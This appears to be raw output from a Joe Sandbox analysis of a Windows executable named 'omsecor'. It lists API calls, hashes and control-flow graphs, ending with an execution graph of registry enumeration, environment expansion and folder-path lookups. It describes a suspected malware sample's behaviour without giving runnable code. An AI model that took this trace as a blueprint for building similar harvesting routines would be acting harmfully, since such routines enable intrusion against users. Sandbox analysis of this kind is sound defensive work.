                            • Part of subcall function 00404121: SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,00000000), ref: 004041D5
                            • Part of subcall function 00404121: UnhandledExceptionFilter.KERNEL32(0040B078,?,?,00000000), ref: 004041DF
                            • Part of subcall function 00404121: GetCurrentProcess.KERNEL32(C000000D,?,?,00000000), ref: 004041FA
                            • Part of subcall function 00404121: TerminateProcess.KERNEL32(00000000,?,?,00000000), ref: 00404201
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401B21: GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                            • Part of subcall function 00401B21: GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          • GetProcAddress.KERNEL32(00000000,GetUserObjectInformationA), ref: 00404904
                          • GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0040491C
                          • __invoke_watson.LIBCMT ref: 0040498F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$Value$ExceptionFilterHandleModuleProcessUnhandled__invoke_watson$CurrentDebuggerLibraryLoadPresentTerminate_memset
                          • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                          • API String ID: 2940365033-232180764
                          • Opcode ID: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction ID: 59fbdf2cbb2ff75c7ae2a14c3bd4fe5a66861bdf874bec260bfce3d1cd22fe51
                          • Opcode Fuzzy Hash: d0843e3b680be133648664f8717c69194e3d07d516d4994a3cb1c1e79535d4f8
                          • Instruction Fuzzy Hash: FD4163F1D00205AEDF10AFB59D86A6F7BA4EB94305B14083FE505F22E0DB7D9944CA5E

                          APIs
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                          • GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                          • GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                          • InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                          • __lock.LIBCMT ref: 00401C86
                          • ___addlocaleref.LIBCMT ref: 00401CA5
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: AddressProc$HandleIncrementInterlockedModule___addlocaleref__lock
                          • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                          • API String ID: 1036688887-2843748187
                          • Opcode ID: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction ID: 560e36331183b230e08dea58ace58335192f7a528c6e8c7e040251058e5fa637
                          • Opcode Fuzzy Hash: 6573cce91d4b34aeafb212c3c1fc7eea0ad3c310865ce8df9fb52cfb0840fec2
                          • Instruction Fuzzy Hash: 32113D719847019EE7209F76CA45B5ABBE4AF04348F10853FE899B62E1CB7C99418F19

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 287 402c5b-402c82 call 402f98 GetStartupInfoA 290 402c83 call 404032 287->290 291 402c88-402c8c 290->291 292 402e92 291->292 293 402c92-402ca3 291->293 295 402e95-402e9a call 402fdd 292->295 294 402cce-402cd0 293->294 296 402cd2-402cd6 294->296 297 402ca5-402cc8 294->297 299 402dd9 296->299 300 402cdc-402ce1 296->300 297->294 302 402ddb-402deb 299->302 300->299 303 402ce7-402cf9 300->303 304 402df8-402dfe 302->304 305 402ded-402df0 302->305 306 402cfb 303->306 307 402cfd-402d00 303->307 309 402e00-402e03 304->309 310 402e05-402e0c 304->310 305->304 308 402df2-402df6 305->308 306->307 311 402d54-402d5a 307->311 314 402e6a-402e6e 308->314 315 402e0f-402e1b GetStdHandle 309->315 310->315 312 402d02-402d04 311->312 313 402d5c 311->313 316 402d06 call 404032 312->316 317 402d64-402d6a 313->317 314->302 318 402e74-402e82 SetHandleCount 314->318 319 402e60-402e64 315->319 320 402e1d-402e1f 315->320 321 402d0b-402d0f 316->321 317->299 322 402d6c-402d74 317->322 318->295 319->314 320->319 323 402e21-402e2a GetFileType 320->323 324 402d11-402d27 321->324 325 402d5e 321->325 326 402d76-402d79 322->326 327 402dcc-402dd7 322->327 323->319 328 402e2c-402e36 323->328 329 402d4f-402d51 324->329 325->317 326->327 330 402d7b-402d7f 326->330 327->299 327->322 331 402e38-402e3c 328->331 332 402e3e-402e41 328->332 335 402d53 329->335 336 402d29-402d49 329->336 330->327 337 402d81-402d83 330->337 333 402e47-402e4f 331->333 332->333 334 402e43 332->334 338 402e50 call 404763 333->338 334->333 335->311 336->329 339 402d90-402db9 337->339 340 402d85-402d8e GetFileType 337->340 342 402e55-402e59 338->342 341 402dba call 404763 339->341 340->327 340->339 343 402dbf-402dc3 341->343 342->292 344 402e5b-402e5e 342->344 343->292 345 402dc9 343->345 344->314 345->327
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 00402C70
                          • __calloc_crt.LIBCMT ref: 00402C83
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                          • __calloc_crt.LIBCMT ref: 00402D06
                          • GetFileType.KERNEL32(00000038), ref: 00402D86
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402DBA
                          • GetStdHandle.KERNEL32(-000000F6), ref: 00402E10
                          • GetFileType.KERNEL32(00000000), ref: 00402E22
                          • ___crtInitCritSecAndSpinCount.LIBCMT ref: 00402E50
                          • SetHandleCount.KERNEL32 ref: 00402E7A
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Count$CritFileHandleInitSpinType___crt__calloc_crt$InfoSleepStartup__calloc_impl
                          • String ID:
                          • API String ID: 1318386821-0
                          • Opcode ID: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction ID: b2392c38ea11d8206f0d28861f948c6360aed0bed67f1e2b59f3cb23873ff797
                          • Opcode Fuzzy Hash: f5d02d02a8b2d0f0c38f4cc661f228c40208417c0c2fd58e7995995fa6c6c4fe
                          • Instruction Fuzzy Hash: 366136715447518ED7248B38CB4C7167BA0EF02324F29437BD9A5BB2E1D7B89806CB9D

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 346 403bd3-403bfa call 403b59 349 403c0a-403c0d 346->349 350 403bfc-403c05 call 403854 346->350 352 403c0f-403c15 349->352 357 403d9d-403da4 350->357 354 403c1b-403c26 352->354 355 403cac-403cd0 call 405f60 352->355 354->352 358 403c28-403c2e 354->358 364 403cfc-403cff 355->364 359 403da5 call 401662 357->359 361 403c34-403c3a 358->361 362 403d9a 358->362 363 403daa-403dab 359->363 361->362 365 403c40-403c4c IsValidCodePage 361->365 362->357 367 403d01-403d11 364->367 368 403cd2-403cd7 364->368 365->362 366 403c52-403c5f GetCPInfo 365->366 369 403c65-403c83 call 405f60 366->369 370 403d8e-403d94 366->370 367->364 371 403d13-403d32 call 403825 367->371 368->367 372 403cd9-403cdf 368->372 380 403d81 369->380 381 403c89-403c8d 369->381 370->350 370->362 382 403d33-403d3e 371->382 375 403cf3-403cf5 372->375 378 403ce1-403cf2 375->378 379 403cf7-403cfb 375->379 378->375 379->364 383 403d84-403d8c 380->383 384 403d62-403d65 381->384 385 403c93 381->385 382->382 386 403d40-403d47 call 4038a9 382->386 383->386 389 403d6a-403d6f 384->389 387 403c96-403c9a 385->387 396 403d4c-403d51 386->396 387->384 390 403ca0-403ca7 387->390 389->389 392 403d71-403d7f call 403825 389->392 394 403d52-403d54 390->394 392->383 394->396 397 403d56-403d5c 394->397 396->394 397->384 397->387
                          APIs
                          • getSystemCP.LIBCMT ref: 00403BEC
                            • Part of subcall function 00403B59: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00403B66
                            • Part of subcall function 00403B59: GetOEMCP.KERNEL32(00000000,?,00402A85,?,?,00000001), ref: 00403B80
                          • setSBCS.LIBCMT ref: 00403BFE
                            • Part of subcall function 00403854: _memset.LIBCMT ref: 00403867
                          • IsValidCodePage.KERNEL32(-00000030,00000000,?,00000000,00409430), ref: 00403C44
                          • GetCPInfo.KERNEL32(00000000,00403F56), ref: 00403C57
                          • _memset.LIBCMT ref: 00403C6F
                          • setSBUpLow.LIBCMT ref: 00403D42
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Locale_memset$CodeInfoPageSystemUpdateUpdate::_Valid
                          • String ID:
                          • API String ID: 2658552758-0
                          • Opcode ID: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction ID: 0e9026f4e105130f7015617c44e62dc713e6d3fa9c6682f74f6de7838a23a284
                          • Opcode Fuzzy Hash: 85fbc29d6093aa115f5ab7fa086d66e65b660b38745e4bae39b2770f61390fd6
                          • Instruction Fuzzy Hash: 875108319042558BDB159F25C8442BABFB8EF05306F14847FE881FF282C63CCA46DB99

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 398 401aaa-401abb TlsGetValue 399 401abd-401ac5 398->399 400 401ade-401aed GetModuleHandleA 398->400 399->400 401 401ac7-401ad4 TlsGetValue 399->401 402 401b12-401b17 400->402 403 401aef-401af6 call 401a3e 400->403 401->400 407 401ad6-401adc 401->407 403->402 408 401af8-401afe GetProcAddress 403->408 409 401b04-401b06 407->409 408->409 409->402 410 401b08-401b0e 409->410 410->402
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401B1F,00000000,00404862,00000000,00000000,00000314,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AB7
                          • TlsGetValue.KERNEL32(00000004,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401ACE
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,0040B078,004025C7,0040B078,Microsoft Visual C++ Runtime Library,00012010), ref: 00401AE3
                          • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00401AFE
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: EncodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-3682587211
                          • Opcode ID: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction ID: 2de7d8fd10128b17cfc71597f2b569db04ade18300f5c4710948ea3b5a4a2571
                          • Opcode Fuzzy Hash: cfafac40d43195ef6ab0f83e6a66070465950e04f68e4f312de4a4817b66f2e0
                          • Instruction Fuzzy Hash: 68F06D307017169BD7219F25DE04A5A3AB8AF80790B16417AB844F62F4EF38DC029A6D

                          Control-flow Graph (legend: Executed / Not Executed)
                          control_flow_graph 412 401b21-401b32 TlsGetValue 413 401b34-401b3c 412->413 414 401b55-401b64 GetModuleHandleA 412->414 413->414 415 401b3e-401b4b TlsGetValue 413->415 416 401b66-401b6d call 401a3e 414->416 417 401b89-401b8e 414->417 415->414 421 401b4d-401b53 415->421 416->417 422 401b6f-401b75 GetProcAddress 416->422 423 401b7b-401b7d 421->423 422->423 423->417 424 401b7f-401b85 423->424 424->417
                          APIs
                          • TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                          • TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                          • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,?,?,00402F66), ref: 00401B5A
                          • GetProcAddress.KERNEL32(00000000,DecodePointer), ref: 00401B75
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressHandleModuleProc
                          • String ID: DecodePointer$KERNEL32.DLL
                          • API String ID: 1929421221-629428536
                          • Opcode ID: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction ID: 1a7e216e592b3cd04d2002f0154b272c3d781bc2d345389bf2442321812c8d59
                          • Opcode Fuzzy Hash: 436f779fc0fdf30fb8c2a4f5b6e2e396cf7c0272443af951d572ffac3d80a1eb
                          • Instruction Fuzzy Hash: 96F062305013129BC7215F24DE44E6A3AB89F407947154136F854F22F0EF34DC018A6D

                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction ID: 7291aa48b631972549e6df949c7a5fbc9f7bec4cf14f78cf3737268845182a7c
                          • Opcode Fuzzy Hash: aba137c0f2f88c3b9200040e126f3ca684e81be6c5eda89adfc1ccd5f8954634
                          • Instruction Fuzzy Hash: C3F02E36D01705A7E720A7B4CE49B6D3134AB88765F35013BF5017B2E2CABC4D06A62D
                          APIs
                          • GetStartupInfoA.KERNEL32(?), ref: 004016EA
                          • GetProcessHeap.KERNEL32(00000000,00000094), ref: 00401705
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00401708
                          • _fast_error_exit.LIBCMT ref: 00401716
                            • Part of subcall function 00401671: __FF_MSGBANNER.LIBCMT ref: 0040167A
                          • ___security_init_cookie.LIBCMT ref: 004018B6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Heap$AllocateInfoProcessStartup___security_init_cookie_fast_error_exit
                          • String ID: j`h
                          • API String ID: 2660455748-2627015977
                          • Opcode ID: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction ID: 38895570f31eb67b982826470c9dd1e6c230b0faa58df9c9f10e023fb9096192
                          • Opcode Fuzzy Hash: c8d3cbbb43655427b4a603559900b38778fbedebf47b5c9131e32ddd9e0d4b3d
                          • Instruction Fuzzy Hash: 4DF0E936E48301D7E720A7A09D49B2D3134AB44765F34053BE001BB2E1CDBC4942661F
                          APIs
                          • __lock.LIBCMT ref: 00403F82
                            • Part of subcall function 004034EE: __mtinitlocknum.LIBCMT ref: 00403502
                            • Part of subcall function 004034EE: __amsg_exit.LIBCMT ref: 0040350E
                            • Part of subcall function 004034EE: RtlEnterCriticalSection.NTDLL(?), ref: 00403516
                          • ___sbh_find_block.LIBCMT ref: 00403F8D
                          • ___sbh_free_block.LIBCMT ref: 00403F9C
                          • HeapFree.KERNEL32(00000000,?,00409450,0000000C,004034CF,00000000,004093D0,0000000C,00403507,?,?,?,00406798,00000004,00409530,0000000C), ref: 00403FCC
                          • GetLastError.KERNEL32(?,00406798,00000004,00409530,0000000C,00404045,?,?,00000000,00000000,00000000,00401CEF,00000001,00000214), ref: 00403FDD
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                          • String ID:
                          • API String ID: 2714421763-0
                          • Opcode ID: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction ID: 478c35e85f2b107ed22a8aba67e00a0e018390ca299f0d6e226d856ee505d4b6
                          • Opcode Fuzzy Hash: 288a25c0387cb816e710d6056d2e667d0bdf05a7bdcb3ee8ac501960d13b8eb0
                          • Instruction Fuzzy Hash: AB012C71D05602AADB207FB29A0AB5E7A78DF0076AF20413FF404B61D1CB7C8A449A9D
                          APIs
                            • Part of subcall function 00401D3D: __amsg_exit.LIBCMT ref: 00401D4B
                          • __amsg_exit.LIBCMT ref: 00403A5F
                          • __lock.LIBCMT ref: 00403A6F
                          • InterlockedDecrement.KERNEL32(?), ref: 00403A8C
                          • InterlockedIncrement.KERNEL32(021B1588), ref: 00403AB7
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Interlocked__amsg_exit$DecrementIncrement__lock
                          • String ID:
                          • API String ID: 4129207761-0
                          • Opcode ID: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction ID: 3b707b5fd0894213fb8e8695ce472a26b52a1803b1b57e4fe7db1faaf9775e12
                          • Opcode Fuzzy Hash: 8585fda054ee7361396d1f478d0024bbf818f9282079b570ad35bde21b9f8bf2
                          • Instruction Fuzzy Hash: 3A018E32E00B119BD611AF6A990974A7B64BB05716F05403BE890773D1C73CAB51DFDE
                          APIs
                          • GetLastError.KERNEL32(?,00000000,00404281,00402202,00000000,00402EFA,FFFFFFFE,?,?,?,?,00402F66), ref: 00401CC8
                            • Part of subcall function 00401B98: TlsGetValue.KERNEL32(00000000,00401CDB,?,?,?,00402F66), ref: 00401B9F
                            • Part of subcall function 00401B98: TlsSetValue.KERNEL32(00000000,?,?,00402F66), ref: 00401BC0
                          • __calloc_crt.LIBCMT ref: 00401CEA
                            • Part of subcall function 00404032: __calloc_impl.LIBCMT ref: 00404040
                            • Part of subcall function 00404032: Sleep.KERNEL32(00000000), ref: 00404057
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000000,00401BB6,?,?,?,00402F66), ref: 00401B2E
                            • Part of subcall function 00401B21: TlsGetValue.KERNEL32(00000004,?,?,?,00402F66), ref: 00401B45
                            • Part of subcall function 00401C07: GetModuleHandleA.KERNEL32(KERNEL32.DLL,00409328,0000000C,00401D18,00000000,00000000,?,?,?,00402F66), ref: 00401C18
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,EncodePointer), ref: 00401C4C
                            • Part of subcall function 00401C07: GetProcAddress.KERNEL32(?,DecodePointer), ref: 00401C5C
                            • Part of subcall function 00401C07: InterlockedIncrement.KERNEL32(0040A3C8), ref: 00401C7E
                            • Part of subcall function 00401C07: __lock.LIBCMT ref: 00401C86
                            • Part of subcall function 00401C07: ___addlocaleref.LIBCMT ref: 00401CA5
                          • GetCurrentThreadId.KERNEL32 ref: 00401D1A
                          • SetLastError.KERNEL32(00000000,?,?,?,00402F66), ref: 00401D32
                          Memory Dump Source
                          • Source File: 0000000D.00000002.1904905497.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 0000000D.00000002.1904270366.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1904905497.000000000040D000.00000040.00000001.01000000.00000008.sdmp
                          • Associated: 0000000D.00000002.1905050512.0000000000422000.00000008.00000001.01000000.00000008.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_omsecor.jbxd
                          Similarity
                          • API ID: Value$AddressErrorLastProc$CurrentHandleIncrementInterlockedModuleSleepThread___addlocaleref__calloc_crt__calloc_impl__lock
                          • String ID:
                          • API String ID: 1081334783-0
                          • Opcode ID: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction ID: d2849ffa799b97934cc6d9bfafbcb639600e9549b280b5eba9c9c239b681eae2
                          • Opcode Fuzzy Hash: 098acf1058f6266e08016df3b7da3ea01f889e9df5624f40869082c495d6053c
                          • Instruction Fuzzy Hash: 2EF0FF325447229AD6363BB96D0AA8F3AA49F41761711093FF580B61F0CF3CD80296AD

                          Execution Graph

                          Execution Coverage:2.3%
                          Dynamic/Decrypted Code Coverage:0%
                          Signature Coverage:0%
                          Total number of Nodes:1144
                          Total number of Limit Nodes:6
6981->6978 6982 409f99 Sleep 6983 409fa7 6982->6983 6592 402c62 6601 406c77 RegOpenKeyExW 6592->6601 6594 402c77 6595 406cb5 GetVersionExW 6594->6595 6596 402c7c 6595->6596 6597 40a8f9 34 API calls 6596->6597 6598 402c8f 6597->6598 6599 40267a 122 API calls 6598->6599 6600 402ca8 6599->6600 6602 406c9b 6601->6602 6603 406c9f 6601->6603 6602->6594 6606 4069c0 RegQueryValueExW RegCloseKey 6603->6606 6605 406cb0 6605->6594 6606->6605 6984 40d2a4 6985 40d2ac 6984->6985 6986 40d378 __except_handler3 6985->6986 6990 40d790 6985->6990 6989 40d2e5 __except_handler3 __except_handler4 _CallDestructExceptionObject 6989->6986 6996 40d110 RtlUnwind 6989->6996 6994 40d7e5 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6990->6994 6995 40d7d1 _ValidateScopeTableHandlers __except_handler4 __FindPESection 6990->6995 6991 40d99d VirtualQuery 6992 40d9b2 6991->6992 6991->6995 6993 40d9cc GetVersionExA 6992->6993 6992->6995 6993->6995 6994->6991 6994->6995 6995->6989 6997 40d128 6996->6997 6997->6989 6607 4053ea HeapCreate 6608 405408 GetProcessHeap 6607->6608 6609 40541c 6607->6609 6608->6609 6626 403740 6609->6626 6627 40375a 6626->6627 6743 40848f RegOpenKeyExW 6627->6743 6630 4037a2 ExpandEnvironmentStringsW 6753 4034a8 6630->6753 6631 403846 6635 40be3a HeapFree 6631->6635 6632 40383c 6757 4033a0 6632->6757 6636 403844 6635->6636 6641 403c10 6636->6641 6637 4037f6 SHGetFolderPathW 6638 4037c3 6637->6638 6638->6637 6639 403837 6638->6639 6640 408248 8 API calls 6638->6640 6639->6631 6639->6632 6640->6638 6642 403c29 6641->6642 6643 40848f 7 API calls 6642->6643 6644 403c6d 6643->6644 6645 403c79 ExpandEnvironmentStringsW 6644->6645 6654 403ca9 6644->6654 6771 4039ea HeapAlloc 6645->6771 6647 403e00 6650 4033a0 HeapFree 6647->6650 6648 403e0a 6651 40be3a HeapFree 6648->6651 6652 403e08 6650->6652 6651->6652 6663 4040e7 6652->6663 6653 403d18 SHGetFolderPathW 6653->6654 6654->6653 6656 408248 8 API calls 6654->6656 6657 403d88 6654->6657 6660 403df7 6654->6660 6788 
4039a3 6654->6788 6656->6654 6658 40848f 7 API calls 6657->6658 6657->6660 6659 403dc8 6658->6659 6659->6660 6661 403dd4 ExpandEnvironmentStringsW 6659->6661 6660->6647 6660->6648 6662 4039a3 8 API calls 6661->6662 6662->6660 6667 404100 6663->6667 6664 40412c SHGetFolderPathW 6664->6667 6665 408248 8 API calls 6665->6667 6666 40416d 6668 404172 6666->6668 6669 40417c 6666->6669 6667->6664 6667->6665 6667->6666 6670 4033a0 HeapFree 6668->6670 6671 40be3a HeapFree 6669->6671 6672 40417a 6670->6672 6671->6672 6673 4041e4 HeapAlloc 6672->6673 6684 404453 6673->6684 6688 404212 6673->6688 6674 4042a0 RegOpenKeyExW 6674->6688 6675 40440f RegEnumKeyExW 6677 404427 RegCloseKey 6675->6677 6675->6688 6676 40443d 6678 40be3a HeapFree 6676->6678 6677->6688 6679 404445 6678->6679 6680 404455 6679->6680 6681 40444b 6679->6681 6683 40be3a HeapFree 6680->6683 6682 4033a0 HeapFree 6681->6682 6682->6684 6683->6684 6691 40451b 6684->6691 6685 40848f 7 API calls 6685->6688 6686 40435e RegOpenKeyExW 6686->6688 6687 40845d 2 API calls 6687->6688 6688->6674 6688->6675 6688->6676 6688->6685 6688->6686 6688->6687 6689 40c3f9 wvnsprintfW 6688->6689 6690 40c00b 3 API calls 6688->6690 6689->6688 6690->6688 6792 40be9d 6691->6792 6693 404535 HeapAlloc 6694 404786 6693->6694 6701 404555 6693->6701 6695 404796 6694->6695 6696 40478c 6694->6696 6698 40be3a HeapFree 6695->6698 6697 4033a0 HeapFree 6696->6697 6699 404794 6697->6699 6698->6699 6711 404a92 6699->6711 6700 4045c5 RegOpenKeyExW 6700->6701 6702 4045e8 RegEnumKeyExW 6700->6702 6701->6700 6703 404780 6701->6703 6704 40476a RegCloseKey 6701->6704 6706 40473d RegEnumKeyExW 6701->6706 6707 40848f 7 API calls 6701->6707 6709 40c3f9 wvnsprintfW 6701->6709 6710 40c00b 3 API calls 6701->6710 6793 40854c RegOpenKeyExW 6701->6793 6702->6701 6705 40be3a HeapFree 6703->6705 6704->6701 6705->6694 6706->6701 6707->6701 6709->6701 6710->6701 6713 404aab 6711->6713 6712 404ad7 SHGetFolderPathW 6712->6713 6713->6712 6714 408248 8 API calls 6713->6714 
